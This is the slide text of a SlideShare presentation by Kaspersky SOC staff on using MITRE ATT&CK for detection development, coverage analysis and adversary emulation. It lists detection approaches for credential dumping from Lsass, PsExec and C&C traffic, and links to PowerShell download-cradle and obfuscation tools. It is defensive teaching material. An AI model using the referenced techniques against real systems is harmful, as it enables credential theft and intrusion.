Download as PDF, PPTX
![Other sources of detect ideas – TI from operations
28
Public
Twitter, blogs, talks, etc.
Tests*
Private
Internal threat research
Operations practice
Threat hunting**
DFIRMA***
Security Assessment/Red teaming
* https://attackevals.mitre.org/evaluations.html , for example
** the practice of searching iteratively through data to detect [advanced] threats that evade automatic security solutions
*** Digital forensics, Incident response, Malware analysis](https://image.slidesharecdn.com/mitre-colaboratory-v4-190108111157/85/How-MITRE-ATT-CK-helps-security-operations-28-320.jpg)
![Other sources of detect ideas – TI from operations
28
Public
Twitter, blogs, talks, etc.
Tests*
Private
Internal threat research
Operations practice
Threat hunting**
DFIRMA***
Security Assessment/Red teaming
* https://attackevals.mitre.org/evaluations.html , for example
** the practice of searching iteratively through data to detect [advanced] threats that evade automatic security solutions
*** Digital forensics, Incident response, Malware analysis](https://image.slidesharecdn.com/mitre-colaboratory-v4-190108111157/75/How-MITRE-ATT-CK-helps-security-operations-28-2048.jpg)
Uploaded bySergey Soldatov
How MITRE ATT&CK helps security operations
The document outlines the roles and backgrounds of Teymur Kheirkhabarov and Sergey Soldatov in security operations, emphasizing the importance of MITRE ATT&CK in enhancing detection strategies against cyber threats. It discusses various attack tactics, techniques, and procedures, alongside methodologies for evaluating detection capabilities and improving security operations. Several use cases illustrate how to effectively adapt and test detection methods to maintain security against advanced threats.
More Related Content
Similar to How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
- 1. Teymur Kheirkhabarov Head ofSOC R&D Sergey Soldatov Head of SOC How MITRE ATT&CK helps security operations
- 2. Who is Sergey? Since 2016: Head of SOC at Kaspersky lab Internal SOC Commercial MDR* services 2012 – 2016: Chief manager at RN-Inform Rosneft security services insourcing 2002 – 2012: TNK-BP Group IT security integration into business and IT operations Security controls in IT projects Security operations 2001-2002: Software developer at RIPN BMSTU graduate CISA, CISSP * Managed Detection and Response
- 3. Who is Teymur? 2016 – : Head of SOC R&D at Kaspersky lab Development: sensors, sensor data, event processing, detection logic, SOC infrastructure SOC R&D team coordination and management 2011 – 2016: Head of Information security IT security integration into business and IT operations Security controls in IT projects Security operations Krasnoyarsk SibSAU graduate
- 4. Detect layers: DavidBianco's pyramid of pain http://detect-respond.blogspot.ru/2013/03/the-pyramid-of-pain.html Commodity Prevention/Detection tools capabilities (can be done automatically) Human Analyst required IoC AM-signature,YaraTTP*-based detect * TTP – tactics techniques and procedures
- 5. Different approaches todetection 5 Attacker activity IoC-based detection Tool-based detection TTP-based detection Use Mimikatz for dumping authentication data (password/hashes) from memory Search for hashes (MD5/SHA1/SHA256) of utilities that dump credentials Search for files with specific extensions. For example, Mimikatz export Kerberos tickets to .kirbi files, and WCE creates wceaux.dll Search for processes, that access Lsass memory Use of unsigned DLLs, loaded into Lsass process Use PsExec for remote administration Search for hashes (MD5/SHA1/SHA256) of utilities for remote administration Search for installations of services, typical for remote administration utilities. For example, psexec installs service PSEXECSVC Search for remote installation of new service, and then that service starts process C&C communication Search for known C&C (IP/FQDN/URL) Search for User-Agents, typical for particular utilities/malware Search for use of particular DGA, typical for specific utilities/malware Search for periodic network communication Search for communication with randomly generated domain names Search for communication with domains, registered not long ago
- 6. Tactics, Techniques andProcedures 6 Tactic - the way the threat actor operates during different steps of its operation/campaign. Tactics represent the “why” of an ATT&CK technique. It is the adversary’s tactical objective: the reason for performing an action. Technique – the approach the threat actor uses to facilitate Tactic. Technique represent “how” an adversary achieves a tactical objective by performing an action. For example, and adversary may dump credentials to achieve credential access Procedure - the exact ways a particular adversary or piece of software implements a technique. These are described by the examples sections in ATT&CK techniques Tactic (Why?) Technique (How?) Procedure (Particular implementation)
- 7. ATT&CK – AdversarialTactics Techniques and Common Knowledge 7 https://attack.mitre.org/matrices/enterprise/ Tactics Techniques
- 8.
- 9. The importance ofProcedure 9 For each Technique many Procedures can be introduced There are Procedures that can’t be detected due to technological limitations Not all procedures are yet known
- 10. What do wedetect? Procedure!
- 11. Where do Procedurescan taken? ATT&CK technique description!
- 12. Good talks inthe Internet https://offzone.moscow/speakers /teymur-heirhabarov/ https://2017.zeronights.ru/report/hunting-for-credentials- dumping-in-windows-environment/ https://www.slideshare.net/heirhabarov/ kheirkhabarov24052017phdays7
- 13. Examples of Techniquesand corresponding Procedures T1086: PowerShell 13
- 14. Examples of Techniquesand corresponding Procedures T1086: PowerShell 14 ~ 45 000 PC, last 30 days period
- 15. Examples of Techniquesand corresponding Procedures T1086: PowerShell. PowerShell in autorun 15
- 16. Examples of Techniquesand corresponding Procedures T1086: PowerShell. PowerShell in autorun 16
- 17. Examples of Techniquesand corresponding Procedures T1086: PowerShell. PowerShell suspicious command lines 17 Before adaptation After adaptation
- 18. Examples of Techniquesand corresponding Procedures T1086: PowerShell. PowerShell download cradles 18 https://gist.github.com/HarmJ0y/bb48307ffa663256e239#file-downloadcradles-ps1
- 19. Examples of Techniquesand corresponding Procedures T1086: PowerShell. PowerShell download cradles 19
- 20. Examples of Techniquesand corresponding Procedures T1086: PowerShell. PowerShell obfuscation 20 https://github.com/danielbohannon/Invoke-Obfuscation
- 21. Examples of Techniquesand corresponding Procedures T1086: PowerShell. PowerShell obfuscation 21
- 22. Examples of Techniquesand corresponding Procedures T1086: PowerShell. PowerShell Base64 encoding 22
- 23. Examples of Techniquesand corresponding Procedures T1084: Windows Management Instrumentation Event Subscription 23
- 24. Examples of Techniquesand corresponding Procedures T1084: Windows Management Instrumentation Event Subscription Enumeration of installed ActiveScript consumers Before adaptation After adaptation ~ 146 000 PC, 1 year period Enumeration of installed CommandLine consumers Before adaptation After adaptation
- 25. Examples of Techniquesand corresponding Procedures T1084: Windows Management Instrumentation Event Subscription 25 Malicious CommandLine event consumer
- 26. Examples of Techniquesand corresponding Procedures T1084: Windows Management Instrumentation Event Subscription 26 Malicious ActiveScript event consumer
- 27. Use case #1:Detects development 27 ATT&CK – one of the good sources of detect ideas Attack emulation Analysis of detection capabilities Required processing Required telemetry Detect development, testing, publication Endless testing in operations Metrics
- 28. Other sources ofdetect ideas – TI from operations 28 Public Twitter, blogs, talks, etc. Tests* Private Internal threat research Operations practice Threat hunting** DFIRMA*** Security Assessment/Red teaming * https://attackevals.mitre.org/evaluations.html , for example ** the practice of searching iteratively through data to detect [advanced] threats that evade automatic security solutions *** Digital forensics, Incident response, Malware analysis
- 29. Use case #1’:Detects development priorities (post-breach) 30 Tactics priorities: Persistence Privilege escalation Defense evasion Credential access Lateral movement Execution … Techniques priorities Available telemetry Used by which APT actors and how they relevant to you? Required investments (~ risk assessment)
- 30. Use case #2:Detects classification 31 Detects management Understand current coverage • What do we have for each technique*? • Gap analysis Extend coverage • Add new detects? • Update existing? Simplifies R&D team work * Through appropriate Procedure
- 31. Detects (“Hunts”) mappedto MITRE techniques
- 32. Use case #3:SOC Analyst’s body of knowledge 33 Attack kill chain (tactics) Known so far attack techniques descriptions Public reports about actual APT campaign linked to used techniques Recommendations on detection and mitigation In addition: • OS architecture • Known attacker’s toolset • Not hypothetical attacks, but taken from practice* * https://reply-to-all.blogspot.com/2013/01/blog-post.html
- 33. Use case #4:detect rate assessment by ATT&CK coverage 34 Choose scenario (sequence of particular procedures)* Execute in lab and see detects Evaluate based on detection types**: Telemetry Enrichment Behavior detect Now results can be compared*** Can the techniques be considered covered based on the test – the question is open – depends on actual procedures, used in test * https://attackevals.mitre.org/ ** https://attackevals.mitre.org/methodology/detection-categorization.html *** https://reply-to-all.blogspot.com/2018/12/mitre-edr.html
- 34. MITRE ATT&CK Evaluations ParticularProcedures: APT3: 56 Enterprise techniques across 10 tactics “Living off the land”* Focus on “Primary” techniques**, on behavior and not tools and IoCs 2 Scenarios: 10-step with Cobalt Strike + 10 step Empire*** Same lab environment for all vendors Detection categorization Main detection types: • None • Telemery • Indicator of Compromise • Enrichment • General behavior • Specific behavior * https://www.youtube.com/watch?v=j-r6UonEkUw ** Differentiate “Primary” and “Enabling” techniques. “Enabling” - many of the techniques required Command-Line Interface, Execution through API, and PowerShell. In assessment MITRE focused on the Primary technique that was performed, rather than the mechanism of execution (which was considered the Enabling technique) *** https://www.cobaltstrike.com/ ; https://github.com/EmpireProject/Empire Modifiers: • Delayed • Tained • Configuration change
- 35. BAS: Breach andAttack Simulation METTA https://github.com/uber-common/metta Caldera https://github.com/mitre/caldera Unfetter https://mitre.github.io/unfetter/ Endgame https://github.com/endgameinc/RTA Red Canary - Atomic read team https://github.com/redcanaryco/atomic-red-team Microsoft https://blogs.technet.microsoft.com/motiba/2018/04/09/invoke-adversary-simulating-adversary-operations/
- 36. KaLaBAS? Existing – vendorspecific Not enough tests Need to integrate to existing auto- testing infrastructure
- 37. Use case #5:Adversary emulation, red teaming 38 Common framework for Red teams, Blue teams and Purple teams collaboration Create adversary emulation scenarios: choose relevant TTP Create red team plan: choose TTPs that might be missed by existing Blue team Gap analysis of current defensive technologies – prioritize future investments SOC operational efficiency (maturity) assessment
- 38.
- 39.